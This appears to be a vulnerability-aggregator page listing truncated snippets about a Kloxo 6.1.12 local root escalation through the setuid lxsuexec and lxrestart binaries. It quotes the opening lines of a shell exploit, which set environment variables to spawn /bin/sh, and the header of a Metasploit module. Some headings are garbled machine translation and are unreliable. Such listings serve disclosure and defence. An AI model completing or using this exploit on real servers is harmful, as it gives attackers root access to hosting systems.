Kloxo 安全漏洞

Kloxo is an open source hosting platform from LxCenter. A security vulnerability exists in Kloxo versions 6.1.12 and earlier, which stems from a local elevation of privilege issue in the lxsuexec and lxrestart binaries that could lead to the execution of arbitrary commands...

Kloxo-6.1.6---Local-Privilege

Date: August 2012 or so Exploit Author: HTP Vendor Homepage: http://lxcenter.org/ Software Link: download link if available Version: 6.1.6 Latest LXLABS=cat /etc/passwd | grep lxlabs | cut -d: -f3 export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECKGID=0 export NONRESIDENT=1...

Kloxo 6.1.6-local mention of the right to exp-vulnerability warning-the black bar safety net

Kloxo 6.1.6-local mention of the right to exp The code is as follows: 1. !/ bin/sh 2. 3. Exploit Title: Kloxo Local Privilege Escalation 4. 5. Google Dork: inurl:kiddies 6. 7. Date: August 2 0 1 2 or so 8. 9. Exploit Author: HTP 1 0. 1 1. Vendor Homepage: http://lxcenter.org/ 1 2. 1 3. Software...

Kloxo 6.1.12 Privilege Escalation

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...

Kloxo 6.1.12 Privilege Escalation Vulnerability

Kloxo versions 6.1.12 and below contain two setuid root binaries. lxsuexec and lxrestart allow local privilege escalation to root from uid 48, Apache by default on CentOS 5.8, the operating system supported by Kloxo. This Metasploit module has been tested successfully with Kloxo 6.1.12 and 6.1.6...

Kloxo Local Privilege Escalation

Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as lxsuexec and lxrestart, allow local privilege escalation to root from uid 48, Apache by default on CentOS 5.8, the operating system supported by Kloxo. This module has been tested successfully with Kloxo 6.1.12 and 6.1.6...